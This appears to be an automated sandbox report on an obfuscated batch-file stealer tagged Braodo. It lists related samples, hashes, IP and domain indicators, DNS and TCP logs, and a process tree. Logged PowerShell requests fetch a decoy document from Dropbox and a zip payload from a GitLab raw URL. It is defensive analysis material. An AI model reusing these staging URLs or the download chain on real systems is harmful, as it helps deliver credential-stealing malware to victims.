gitlab.com | hsfgdf17.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
gitlab.com | gar17lksgf.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
gitlab.com | hnsjdghf18.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
gitlab.com | kjshdgacg18.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
gitlab.com | sldkjgsdGarDe3.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
gitlab.com | jhsdfggga13.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
www-env.dropbox-dns.com | hnghksdjfhs19De.bat | malicious | Abobus Obfuscator, Braodo | 162.125.69.18
www-env.dropbox-dns.com | jhsdgfjkh236.bat | malicious | Abobus Obfuscator, Braodo | 162.125.69.18
www-env.dropbox-dns.com | kjhsdgGarmin17.bat | malicious | Abobus Obfuscator, Braodo | 162.125.69.18
www-env.dropbox-dns.com | hngadsfkgj17.bat | malicious | Abobus Obfuscator, Braodo | 162.125.69.18
www-env.dropbox-dns.com | hsfgdf17.bat | malicious | Abobus Obfuscator, Braodo | 162.125.69.18
www-env.dropbox-dns.com | gar17lksgf.bat | malicious | Abobus Obfuscator, Braodo | 162.125.69.18
www-env.dropbox-dns.com | QhR8Zp6fZs.lnk | malicious | RHADAMANTHYS | 162.125.69.18
www-env.dropbox-dns.com | CNUXJvLcgw.lnk | malicious | RHADAMANTHYS | 162.125.69.18
                                                                                                                                                                                                                        xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                        edge-block-www-env.dropbox-dns.comhnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.15
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS | Browse | 172.67.179.109
CLOUDFLARENETUS | ny.lnk.d.lnk | Get hash | malicious | Unknown | Browse | 172.67.211.185
CLOUDFLARENETUS | rs.lnk.d.lnk | Get hash | malicious | Unknown | Browse | 172.67.211.185
CLOUDFLARENETUS | hnghksdjfhs19De.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 172.65.251.78
CLOUDFLARENETUS | jhsdgfjkh236.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 172.65.251.78
CLOUDFLARENETUS | kjhsdgGarmin17.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 172.65.251.78
CLOUDFLARENETUS | hngadsfkgj17.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 172.65.251.78
CLOUDFLARENETUS | hsfgdf17.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 172.65.251.78
CLOUDFLARENETUS | gar17lksgf.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 172.65.251.78
CLOUDFLARENETUS | RECOUVREMENT -FACTURER1184521.pdf | Get hash | malicious | Unknown | Browse | 172.64.41.3
DROPBOXUS | hnghksdjfhs19De.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.18
DROPBOXUS | jhsdgfjkh236.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.18
DROPBOXUS | kjhsdgGarmin17.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.18
DROPBOXUS | hngadsfkgj17.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.18
DROPBOXUS | hsfgdf17.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.18
DROPBOXUS | gar17lksgf.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.18
DROPBOXUS | QhR8Zp6fZs.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 162.125.69.15
DROPBOXUS | CNUXJvLcgw.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 162.125.4.18
DROPBOXUS | xWpAZpLw47.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 162.125.69.15
DROPBOXUS | RFQ Letter and Instructions.pdf | Get hash | malicious | Unknown | Browse | 162.125.21.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS | Browse | 162.125.69.18, 172.65.251.78
3b5074b1b5d032e5620f69f9f700ff0e | ny.lnk.d.lnk | Get hash | malicious | Unknown | Browse | 162.125.69.18, 172.65.251.78
3b5074b1b5d032e5620f69f9f700ff0e | rs.lnk.d.lnk | Get hash | malicious | Unknown | Browse | 162.125.69.18, 172.65.251.78
3b5074b1b5d032e5620f69f9f700ff0e | hnghksdjfhs19De.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.18, 172.65.251.78
3b5074b1b5d032e5620f69f9f700ff0e | jhsdgfjkh236.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.18, 172.65.251.78
3b5074b1b5d032e5620f69f9f700ff0e | kjhsdgGarmin17.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.18, 172.65.251.78
3b5074b1b5d032e5620f69f9f700ff0e | hngadsfkgj17.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.18, 172.65.251.78
3b5074b1b5d032e5620f69f9f700ff0e | hsfgdf17.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.18, 172.65.251.78
3b5074b1b5d032e5620f69f9f700ff0e | gar17lksgf.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.18, 172.65.251.78
3b5074b1b5d032e5620f69f9f700ff0e | QhR8Zp6fZs.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 162.125.69.18, 172.65.251.78
No context
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                        Entropy (8bit):0.6599547231656377
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:NlllulF/:NllU
                                                                                                                                                                                                                        MD5:D4E6196808B47A1E5AF7B5A60B402DF3
                                                                                                                                                                                                                        SHA1:B95060DEECFA481BAC34C97BBEBF0C63103293B4
                                                                                                                                                                                                                        SHA-256:E15BCC9157652A05817A5261332766027BD5CC4462C2E0492FB4C530251EAE9F
                                                                                                                                                                                                                        SHA-512:2A85D3E6E058A9347821DD908E48D5BB3C5169B8C40B750C97742592D0233A7B7E2BD34EBA4C139E4981F7B5B81A494F2D075465E6572B9D451ACE17D259AFE7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:@...e...........................................................
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\cmd.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 14
Entropy (8bit): 3.521640636343319
Encrypted: false
SSDEEP: 3:Mrv:gv
MD5: CE585C6BA32AC17652D2345118536F9C
SHA1: BE0E41B3690C42E4C0CDB53D53FC544FB46B758D
SHA-256: 589C942E748EA16DC86923C4391092707CE22315EB01CB85B0988C6762AA0ED3
SHA-512: D397EDA475D6853CE5CC28887690DDD5F8891BE43767CDB666396580687F901FB6F0CC572AFA18BDE1468A77E8397812009C954F386C8F69CC0678E1253D5752
Malicious: false
Preview: ECHO is off...
Process: C:\Windows\System32\find.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 36
Entropy (8bit): 3.8956388075276664
Encrypted: false
SSDEEP: 3:gOmAe9qQn:xm/
MD5: 89D484A82D15549C8F4BF2B4D4F1E924
SHA1: 58F49E997A58A17C2902E08026BAC2DD16A34B1B
SHA-256: 040AE1183CD6102AC612B2D88C2816B358FDC4743BC9CD05376E797595167B40
SHA-512: C0C920A9369FF9E28C9DAE6CA21AE7A1F9A79F2F4F8F97E247D133700FC446CEAA2C6C40116DE644CEA9336D9064792F3AD7011EBCBF5B6675779C57590F167B
Malicious: false
Preview: FIND: Parameter format not correct..
File type: Unicode text, UTF-16, little-endian text, with very long lines (17045), with no line terminators
Entropy (8bit): 5.64631092555636
TrID:
• Text - UTF-16 (LE) encoded (2002/1) 66.67%
• MP3 audio (1001/1) 33.33%
File name: fghdsdf17.bat
File size: 34'092 bytes
MD5: 065d7356dd69172c50ad447904d19df9
SHA1: 034f82a55696405a385720b6d5b0e669881dbbf6
SHA256: 016e96cc8d72183ca8d8f2b00c3effaac50f44888504d38519dc7dbfc062f64d
SHA512: 5c72e0daa69a85d49386ed9451137a85eccad45351cee2b3fdfe5afb621246560b112a11eb3134e85cbdec1c024b372fdbe2d0b9116146146cecf139a868ccbb
SSDEEP: 768:KOj370GPrRFVzQ4WYIbOiNRwy6P1hMBypl2wisZtcG/+oVfdI6l8K8JfW2ProbMZ:b/z0b1Rwy6P1hMBypl2wisZtcG/+oVfa
TLSH: 80E2C744070F2A4B16879B61E152EAB224E5747F24BF9736CA3C75EC96B150CDE3283B
File Content Preview: ....>nul 2>&1 &cls.;@e%...(......_...)......(......_...)^......(......_...)...(.........)(........)...( ..._...)...%%...(......_...)^...(........)(........)(........)(........)(.........)%%(.........)(........)(.........)(......^...)(........)(........)%^
Icon Hash: 9686878b929a9886
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 14:20:19.484086037 CET | 49704 | 443 | 192.168.2.8 | 162.125.69.18
Dec 19, 2024 14:20:19.484122992 CET | 443 | 49704 | 162.125.69.18 | 192.168.2.8
Dec 19, 2024 14:20:19.484260082 CET | 49704 | 443 | 192.168.2.8 | 162.125.69.18
Dec 19, 2024 14:20:19.494216919 CET | 49704 | 443 | 192.168.2.8 | 162.125.69.18
Dec 19, 2024 14:20:19.494229078 CET | 443 | 49704 | 162.125.69.18 | 192.168.2.8
Dec 19, 2024 14:20:21.204276085 CET | 443 | 49704 | 162.125.69.18 | 192.168.2.8
Dec 19, 2024 14:20:21.204360962 CET | 49704 | 443 | 192.168.2.8 | 162.125.69.18
Dec 19, 2024 14:20:21.241792917 CET | 49704 | 443 | 192.168.2.8 | 162.125.69.18
Dec 19, 2024 14:20:21.241818905 CET | 443 | 49704 | 162.125.69.18 | 192.168.2.8
Dec 19, 2024 14:20:21.242084980 CET | 443 | 49704 | 162.125.69.18 | 192.168.2.8
Dec 19, 2024 14:20:21.253273964 CET | 49704 | 443 | 192.168.2.8 | 162.125.69.18
Dec 19, 2024 14:20:21.295327902 CET | 443 | 49704 | 162.125.69.18 | 192.168.2.8
Dec 19, 2024 14:20:22.321645021 CET | 443 | 49704 | 162.125.69.18 | 192.168.2.8
Dec 19, 2024 14:20:22.321728945 CET | 443 | 49704 | 162.125.69.18 | 192.168.2.8
Dec 19, 2024 14:20:22.321779013 CET | 49704 | 443 | 192.168.2.8 | 162.125.69.18
Dec 19, 2024 14:20:22.321829081 CET | 49704 | 443 | 192.168.2.8 | 162.125.69.18
Dec 19, 2024 14:20:22.327637911 CET | 49704 | 443 | 192.168.2.8 | 162.125.69.18
Dec 19, 2024 14:20:29.359955072 CET | 49705 | 443 | 192.168.2.8 | 172.65.251.78
Dec 19, 2024 14:20:29.360008955 CET | 443 | 49705 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:29.360091925 CET | 49705 | 443 | 192.168.2.8 | 172.65.251.78
Dec 19, 2024 14:20:29.362826109 CET | 49705 | 443 | 192.168.2.8 | 172.65.251.78
Dec 19, 2024 14:20:29.362839937 CET | 443 | 49705 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:30.611351967 CET | 443 | 49705 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:30.611572981 CET | 49705 | 443 | 192.168.2.8 | 172.65.251.78
Dec 19, 2024 14:20:30.615022898 CET | 49705 | 443 | 192.168.2.8 | 172.65.251.78
Dec 19, 2024 14:20:30.615029097 CET | 443 | 49705 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:30.615573883 CET | 443 | 49705 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:30.626559019 CET | 49705 | 443 | 192.168.2.8 | 172.65.251.78
Dec 19, 2024 14:20:30.671328068 CET | 443 | 49705 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:31.180069923 CET | 443 | 49705 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:31.180136919 CET | 443 | 49705 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:31.180210114 CET | 49705 | 443 | 192.168.2.8 | 172.65.251.78
Dec 19, 2024 14:20:31.180224895 CET | 443 | 49705 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:31.180278063 CET | 443 | 49705 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:31.180349112 CET | 49705 | 443 | 192.168.2.8 | 172.65.251.78
Dec 19, 2024 14:20:31.184604883 CET | 49705 | 443 | 192.168.2.8 | 172.65.251.78
Dec 19, 2024 14:20:31.226567030 CET | 49706 | 443 | 192.168.2.8 | 172.65.251.78
Dec 19, 2024 14:20:31.226608992 CET | 443 | 49706 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:31.226725101 CET | 49706 | 443 | 192.168.2.8 | 172.65.251.78
Dec 19, 2024 14:20:31.234534025 CET | 49706 | 443 | 192.168.2.8 | 172.65.251.78
Dec 19, 2024 14:20:31.234554052 CET | 443 | 49706 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:31.251651049 CET | 49706 | 443 | 192.168.2.8 | 172.65.251.78
Dec 19, 2024 14:20:31.299340010 CET | 443 | 49706 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:32.599298000 CET | 443 | 49706 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:32.599476099 CET | 443 | 49706 | 172.65.251.78 | 192.168.2.8
Dec 19, 2024 14:20:32.599553108 CET | 49706 | 443 | 192.168.2.8 | 172.65.251.78
Dec 19, 2024 14:20:32.599586010 CET | 49706 | 443 | 192.168.2.8 | 172.65.251.78
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 14:20:19.139681101 CET | 55504 | 53 | 192.168.2.8 | 1.1.1.1
Dec 19, 2024 14:20:19.475780964 CET | 53 | 55504 | 1.1.1.1 | 192.168.2.8
Dec 19, 2024 14:20:22.329161882 CET | 55977 | 53 | 192.168.2.8 | 1.1.1.1
Dec 19, 2024 14:20:22.615406990 CET | 53 | 55977 | 1.1.1.1 | 192.168.2.8
Dec 19, 2024 14:20:29.155438900 CET | 50962 | 53 | 192.168.2.8 | 1.1.1.1
Dec 19, 2024 14:20:29.354907036 CET | 53 | 50962 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 14:20:19.139681101 CET | 192.168.2.8 | 1.1.1.1 | 0x4bc7 | Standard query (0) | www.dropbox.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 14:20:22.329161882 CET | 192.168.2.8 | 1.1.1.1 | 0x508e | Standard query (0) | uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 14:20:29.155438900 CET | 192.168.2.8 | 1.1.1.1 | 0x9cce | Standard query (0) | gitlab.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 14:20:19.475780964 CET | 1.1.1.1 | 192.168.2.8 | 0x4bc7 | No error (0) | www.dropbox.com | www-env.dropbox-dns.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 14:20:19.475780964 CET | 1.1.1.1 | 192.168.2.8 | 0x4bc7 | No error (0) | www-env.dropbox-dns.com | | 162.125.69.18 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 14:20:22.615406990 CET | 1.1.1.1 | 192.168.2.8 | 0x508e | No error (0) | uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com | edge-block-www-env.dropbox-dns.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 14:20:22.615406990 CET | 1.1.1.1 | 192.168.2.8 | 0x508e | No error (0) | edge-block-www-env.dropbox-dns.com | | 162.125.69.15 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 14:20:29.354907036 CET | 1.1.1.1 | 192.168.2.8 | 0x9cce | No error (0) | gitlab.com | | 172.65.251.78 | A (IP address) | IN (0x0001) | false
• www.dropbox.com
• gitlab.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49704 | 162.125.69.18 | 443 | 3324 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 13:20:21 UTC | 192 | OUT | GET /scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1 HTTP/1.1
Host: www.dropbox.com
Connection: Keep-Alive
2024-12-19 13:20:22 UTC | 4091 | IN | HTTP/1.1 302 Found
Content-Security-Policy: object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://*.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; font-src https://* data: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox [TRUNCATED]
Content-Type: text/html; charset=utf-8
Location: https://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com/cd/0/get/Cgi0y-YI8TenZYJubto-r9s_MQQdwDu_micGOUjoiCNyDG3abjg-xLiPRgTDhyBJc_rCV5B_9OPjd6Ut-cuFVhqfy67TiRfcTcMQGJwQB8jTDzUpnstFMAuZFmM9WfK8dO5muoiRo0hic99Wq3xgrMj3/file?dl=1#
Pragma: no-cache
                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                        Set-Cookie: gvc=MzMzNTM4MjE2NzM5MTg3NTMzODAyNDA1MTM1NjM3NTUyMzY2ODAy; Path=/; Expires=Tue, 18 Dec 2029 13:20:21 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                        Set-Cookie: t=7eFEzW5yg4UGC9FQVug3QC9B; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 13:20:21 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                        Set-Cookie: __Host-js_csrf=7eFEzW5yg4UGC9FQVug3QC9B; Path=/; Expires=Fri, 19 Dec 2025 13:20:21 GMT; Secure; SameSite=None
                                                                                                                                                                                                                        Set-Cookie: __Host-ss=x459oKx-yI; Path=/; Expires=Fri, 19 Dec 2025 13:20:21 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                        Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 13:20:21 GMT
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                        Content-Length: 17
                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 13:20:22 GMT
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                                                        X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                        X-Dropbox-Request-Id: 1095e21d76264657a8dd8fcf6e65563c
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2024-12-19 13:20:22 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                        Data Ascii: ...status=302-->


Session ID: 1
Source IP: 192.168.2.8
Source Port: 49705
Destination IP: 172.65.251.78
Destination Port: 443
PID: 5512
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-12-19 13:20:30 UTC
Bytes transferred: 95
Direction: OUT
Data:
GET /garvdsf/dsfg/-/raw/main/FGa1712.zip HTTP/1.1
Host: gitlab.com
Connection: Keep-Alive

Timestamp: 2024-12-19 13:20:31 UTC
Bytes transferred: 453
Direction: IN
Data:
HTTP/1.1 302 Found
Date: Thu, 19 Dec 2024 13:20:31 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Location: https://gitlab.com/users/sign_in
CF-Ray: 8f47b0c11bd541ba-EWR
CF-Cache-Status: MISS
Cache-Control: no-cache
Set-Cookie: _gitlab_session=f7776af91b924cb4b1d3c44e23d75a8a; path=/; expires=Thu, 19 Dec 2024 15:20:31 GMT; secure; HttpOnly; SameSite=None
Strict-Transport-Security: max-age=31536000

Timestamp: 2024-12-19 13:20:31 UTC
Bytes transferred: 2134
Direction: IN
Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/

Timestamp: 2024-12-19 13:20:31 UTC
Bytes transferred: 508
Direction: IN
Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lr4c0GQkbLRuyjNTTlakIZe7LBux0%2F5y1mdxvAm3pRz%2BDce9559%2BV9HRd%2F3X5emFvjeoqzhMnjGtjciQBaM%2F6DptuMq6E%2FIyouW%2FoCyTmtIq2FnRQ53mghVxC0U%3D"}],"group":"cf-nel","max_age":604800

Timestamp: 2024-12-19 13:20:31 UTC
Bytes transferred: 104
Direction: IN
Data Ascii: 62<html><body>You are being <a href="https://gitlab.com/users/sign_in">redirected</a>.</body></html>

Timestamp: 2024-12-19 13:20:31 UTC
Bytes transferred: 5
Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 08:20:15
Start date: 19/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fghdsdf17.bat" "
Imagebase: 0x7ff780880000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 1
Start time: 08:20:15
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 08:20:15
Start date: 19/12/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp.com 437
Imagebase: 0x7ff6e93a0000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 08:20:15
Start date: 19/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c type tmp
Imagebase: 0x7ff780880000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 08:20:15
Start date: 19/12/2024
Path: C:\Windows\System32\find.exe
Wow64 process (32bit): false
Commandline: find
Imagebase: 0x7ff6b52f0000
File size: 17'920 bytes
MD5 hash: 4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:findstr /L /I set "C:\Users\user\Desktop\fghdsdf17.bat"
                                                                                                                                                                                                                        Imagebase:0x7ff68bd80000
                                                                                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:findstr /L /I goto "C:\Users\user\Desktop\fghdsdf17.bat"
                                                                                                                                                                                                                        Imagebase:0x7ff68bd80000
                                                                                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:findstr /L /I echo "C:\Users\user\Desktop\fghdsdf17.bat"
                                                                                                                                                                                                                        Imagebase:0x7ff68bd80000
                                                                                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
